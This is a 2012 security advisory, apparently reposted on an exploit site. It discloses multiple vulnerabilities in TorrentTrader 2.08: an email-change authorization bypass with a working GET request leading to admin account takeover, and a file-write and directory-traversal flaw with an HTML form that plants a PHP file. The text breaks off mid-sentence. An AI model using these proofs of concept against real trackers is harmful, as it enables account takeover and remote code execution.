Home / exploits TorrentTrader 2.08 XSS / Directory Traversal / Bypass
Posted on 17 September 2012
[waraxe-2012-SA#089] - Multiple Vulnerabilities in TorrentTrader 2.08 =============================================================================== Author: Janek Vind "waraxe" Date: 17. September 2012 Location: Estonia, Tartu Web: http://www.waraxe.us/advisory-89.html Description of vulnerable software: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ TorrentTrader is a feature packed and highly customisable PHP/MySQL Based BitTorrent tracker. Featuring integrated forums, and plenty of administration options. http://sourceforge.net/projects/torrenttrader/ http://www.torrenttrader.org/topic/14292-torrenttrader-v208-released/ ############################################################################### 1. Unauthorized Email Change in "account-ce.php" ############################################################################### Reason: authorization bypass Attack vector: user submitted GET parameters "id", "secret" and "email" Preconditions: none Result: attacker can change any user's email, including admin's -----------------[ source code start ]--------------------------------- $id = (int) $_GET["id"]; $md5 = $_GET["secret"]; $email = $_GET["email"]; .. $res = SQL_Query_exec("SELECT `editsecret` FROM `users` WHERE `enabled` = 'yes' AND `status` = 'confirmed' AND `id` = '$id'"); $row = mysql_fetch_assoc($res); .. $sec = $row["editsecret"]; if ($md5 != md5($sec . $email . $sec)) show_error_msg(T_("ERROR"), T_("NOTHING_FOUND"), 1); SQL_Query_exec("UPDATE `users` SET `editsecret` = '', `email` = ".sqlesc($email)." WHERE `id` = '$id' AND `editsecret` = " . sqlesc($row["editsecret"])); -----------------[ source code end ]----------------------------------- Tests: Let's find md5 hash of email "test@test.com", which is "b642b4217b34b1e8d3bd915fc65c4452". Target user ID is 1. We issue GET request: http://localhost/torrenttrader208/account-ce.php?id=1& secret=b642b4217b34b1e8d3bd915fc65c4452&email=test@test.com Quick look to the database confirms, that email address of user with ID 1 has been changed indeed. Next logical move for attacker is password recovery request: http://localhost/torrenttrader208/account-recover.php After admin account takeover attacker is able to use next vulnerability, described below, which may allow php remote code execution. ############################################################################### 2. Arbitrary file creation / directory traversal in "nfo-edit.php" ############################################################################### Reason: failure to properly sanitize user submitted data Attack vector: user submitted POST parameters "id" and "content" Preconditions: 1. nfo-file editing privileges needed (usually admin) 2. PHP must be < 5.3.4 for null-byte attacks to work Result: 1. attacker is able to write remote files with arbitrary content 2. directory traversal vulnerability allows bypassing path restrictions -----------------[ source code start ]--------------------------------- $id = (int)$_GET["id"]?$_GET["id"]:$_POST["id"]; $do = $_POST["do"]; $nfo = $site_config["nfo_dir"] . "/$id.nfo"; if ($do == "update") { if (file_put_contents($nfo, $_POST["content"])) { write_log("NFO ($id) was updated by $CURUSER[username]."); -----------------[ source code end ]----------------------------------- Test: first we need html form like the one below: <html><body><center> <form action="http://localhost/torrenttrader208/nfo-edit.php" method="post" enctype="multipart/form-data"> <input type="hidden" name="do" value="update"> <input type="hidden" name="id" value="test.php"> <input type="hidden" name="content" value="<?php phpinfo();?>"> <input type="submit" value="Test"> </form></center></body></html> Log in as admin and then make POST request by cliking "Test" button. We should see "NFO Updated" as response and can confirm new file existence: http://localhost/torrenttrader208/uploads/test.php.nfo By using null byte ("